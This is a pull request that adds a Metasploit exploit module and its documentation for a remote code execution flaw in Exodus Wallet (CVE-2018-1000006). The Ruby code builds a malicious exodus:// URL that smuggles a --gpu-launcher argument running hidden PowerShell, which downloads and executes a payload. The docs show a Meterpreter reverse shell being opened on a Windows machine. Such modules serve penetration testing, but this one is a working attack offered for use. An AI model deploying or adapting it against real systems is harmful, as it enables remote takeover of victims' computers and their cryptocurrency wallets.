### PR TITLE
Exodus Wallet Remote Code Execution

### DIFF
--- a/documentation/modules/exploit/windows/browser/exodus.md
+++ b/documentation/modules/exploit/windows/browser/exodus.md
@@ -1,0 +1,45 @@
+
+## Verification Steps
+    1. Install Exodus Wallet version `v1.38.0`
+  6. Start `msfconsole`
+    3. Do `use exploit/windows/browser/exodus`
+  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+  12. Do `set LHOST ip`
+    6. Do `exploit`
+    7. In the target machine browse to the malicious URL an launch Exodus
+  14. Verify the Meterpreter session is opened
+
+## Scenarios
+
+# Exodus Wallet on Windows 7 SP1
+
+```
+msf > use exploit/windows/browser/exodus
+msf exploit(windows/browser/exodus) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/browser/exodus) > set LHOST 172.16.40.5 
+LHOST => 172.16.40.5
+msf exploit(windows/browser/exodus) > exploit 
+[*] Exploit running as background job 0.
+
+[*] Started reverse TCP handler on 172.16.40.5:4444 
+[*] Using URL: http://0.0.0.0:80/
+msf exploit(windows/browser/exodus) > [*] Local IP: http://172.16.40.5:80/
+[*] Server started.
+[*] 172.16.40.149    exodus - Delivering Payload
+[*] Sending stage (179779 bytes) to 172.16.40.149
+[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.149:49726) at 2018-02-23 15:40:17 +0000
+
+msf exploit(windows/browser/exodus) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer        : DESKTOP-PI8214R
+OS              : Windows 10 (Build 10586).
+Architecture    : x64
+System Language : pt_PT
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```

--- a/documentation/modules/exploit/windows/browser/exodus.md
+++ b/documentation/modules/exploit/windows/browser/exodus.md
@@ -1,13 +1,13 @@
 
 ## Verification Steps
-    1. Install Exodus Wallet version `v1.38.0`
-  6. Start `msfconsole`
-    3. Do `use exploit/windows/browser/exodus`
-  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
-  12. Do `set LHOST ip`
-    6. Do `exploit`
-    7. In the target machine browse to the malicious URL an launch Exodus
-  14. Verify the Meterpreter session is opened
+1. Install Exodus Wallet version `v1.38.0`
+2. Start `msfconsole`
+3. Do `use exploit/windows/browser/exodus`
+4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+5. Do `set LHOST ip`
+6. Do `exploit`
+7. In the target machine browse to the malicious URL an launch Exodus
+8. Verify the Meterpreter session is opened
 
 ## Scenarios
 

--- a/modules/exploits/windows/browser/exodus.rb
+++ b/modules/exploits/windows/browser/exodus.rb
@@ -1,0 +1,104 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Exodus Wallet (ElectronJS Framework) remote Code Execution',
+      'Description'  => %q(
+         This module exploits a Remote Code Execution vulnerability in Exodus Wallet,
+         a vulnerability in the ElectronJS Framework protocol handler can be used to
+         get arbitrary command execution if the user clicks on a specially crafted URL.
+      ),
+      'License'      => MSF_LICENSE,
+      'Author'       =>
+        [
+          'Wflki',          # Original exploit author
+          'Daniel Teixeira' # MSF module author
+        ],
+      'DefaultOptions' =>
+        {
+          'SRVPORT'    => '80',
+          'URIPATH'    => '/',
+        },
+      'References'     =>
+        [
+          [ 'EDB', '43899' ],
+          [ 'BID', '102796' ],
+          [ 'CVE', '2018-1000006' ],
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['PSH (Binary)', {
+            'Platform' => 'win',
+            'Arch' => [ARCH_X86, ARCH_X64]
+          }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 25 2018'
+    ))
+
+  register_advanced_options(
+    [
+      OptBool.new('PSH-Proxy',            [ true,  'PSH - Use the system proxy', true ]),
+    ], self.class
+  )
+  end
+
+  def gen_psh(url)
+      ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+
+      download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
+
+      download_and_run = "#{ignore_cert}#{download_string}"
+
+      return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
+  end
+
+  def serve_payload(cli)
+   data = cmd_psh_payload(payload.encoded,
+      payload_instance.arch.first,
+      remove_comspec: true,
+      exec_in_place: true
+    )
+
+    print_status("Delivering Payload")
+    send_response_html(cli, data, 'Content-Type' => 'application/octet-stream')
+  end
+
+  def serve_page(cli)
+    psh = gen_psh("#{get_uri}/payload")
+    psh_escaped = psh.gsub("\\","\\\\\\\\").gsub("'","\\\\'")
+    val = rand_text_alpha(5)
+
+    html = %Q|<html>
+<!doctype html>
+<script>
+  window.location = 'exodus://#{val}" --gpu-launcher="cmd.exe /k #{psh_escaped}" --#{val}='
+</script>
+</html>
+|
+    send_response_html(cli, html)
+  end
+
+  def on_request_uri(cli, request)
+    case request.uri
+    when /payload$/
+      serve_payload(cli)
+    else
+      serve_page(cli)
+    end
+  end
+
+end


### PR DESCRIPTION
This PR adds a module to exploit a remote code execution vulnerability in Exodus Wallet versions 1.8.2-beta.3 and earlier, 1.7.10 and earlier, 1.6.15 and earlier.

- [x] Install the application
- [x] Start `msfconsole`
- [x] `use exploit/windows/browser/exodus`
- [x] `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] `set LHOST`
- [x] Run
- [x] In the target machine browse to the malicious URL an launch Exodus
- [x] Enjoy your session